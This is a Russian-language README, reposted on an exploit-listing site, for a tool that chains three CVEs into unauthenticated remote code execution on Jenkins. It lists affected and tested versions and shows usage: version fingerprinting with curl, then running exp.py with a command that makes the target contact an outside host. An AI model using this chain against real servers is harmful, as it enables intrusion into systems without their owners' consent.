## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ORANGETW-AWESOME-JENKINS-RCE-2019
# awesome-jenkins-rce-2019
С мая 2017 года в Jenkins не было RCE без аутентификации, но теперь есть!
Он объединяет CVE-2018-1000861, CVE-2019-1003005 и CVE-2019-1003029 для более надёжного и элегантного удалённого выполнения кода без аутентификации!
# Затронутые версии
* ANONYMOUS_READ отключён
* Версия Jenkins < 2.138
* ANONYMOUS_READ включён (или при наличии обычной учётной записи)
* Время сборки Jenkins < 2019-01-28
# Использование
root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
# Протестировано на
* Jenkins 2.53
* Jenkins 2.122
* Jenkins 2.137
* Jenkins 2.138 с включённым ANONYMOUS_READ
* Jenkins 2.152 с включённым ANONYMOUS_READ
* Jenkins 2.153 с включённым ANONYMOUS_READ
* Script Security Plugin 1.43
* Script Security Plugin 1.48
# Благодарности
* @orange_8361 за CVE-2018-1000861
* @0ang3el за CVE-2019-1003005
* @webpentest за CVE-2019-1003029
Часть слайдов из моего доклада на HITB AMS 2019:
  
# Ссылки
* Взлом Jenkins, часть 1: играем с динамической маршрутизацией
* Взлом Jenkins, часть 2: злоупотребляем метапрограммированием для RCE без аутентификации
* Бюллетень безопасности Jenkins 2018-12-05
* Бюллетень безопасности Jenkins 2019-01-28
* Бюллетень безопасности Jenkins 2019-03-06